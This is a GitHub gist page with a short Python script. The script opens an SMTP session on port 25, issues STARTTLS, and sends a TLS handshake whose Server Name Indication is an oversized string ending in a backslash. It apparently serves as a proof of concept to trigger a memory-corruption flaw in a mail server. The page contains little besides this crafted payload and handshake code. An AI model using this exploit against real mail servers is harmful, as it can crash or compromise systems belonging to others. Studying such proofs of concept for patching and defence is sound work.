Last active
September 23, 2019 06:19
-
-
Save LoadLow/7fe19307f728aeb26e090651f8fcb647 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import scapy | |
from scapy_ssl_tls.ssl_tls import * | |
from socket import * | |
cc = socket(AF_INET, SOCK_STREAM) | |
cc.connect(("127.0.0.1", 25)) | |
print(str(cc.recv(1024))) | |
cc.send('ehlo localhost\r\n') | |
print(str(cc.recv(1024))) | |
cc.send('starttls\r\n') | |
print(str(cc.recv(1024))) | |
sni_payload = ('A'* 253) + "\\" | |
tls_version = TLSVersion.TLS_1_0 | |
ciphers = [TLSCipherSuite.RSA_WITH_AES_128_CBC_SHA] | |
extensions = [TLSExtension() / TLSExtServerNameIndication(server_names=TLSServerName(data=sni_payload))] | |
with TLSSocket(cc, client=True) as tls_socket: | |
tls_ctx = tls_socket.tls_ctx | |
try: | |
server_hello, server_kex = tls_socket.do_handshake(tls_version, ciphers, extensions) | |
server_hello.show() | |
except TLSProtocolError as tpe: | |
print("Got TLS error: %s" % tpe) | |
tpe.response.show() | |
else: | |
resp = tls_socket.do_round_trip(TLSPlaintext(data="HELP\r\n")) | |
print("Got response from server") | |
resp.show() | |
resp = tls_socket.do_round_trip(TLSPlaintext(data="QUIT\r\n")) | |
print("Got response from server") | |
resp.show() | |
finally: | |
print(tls_socket.tls_ctx) | |
tls_socket.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment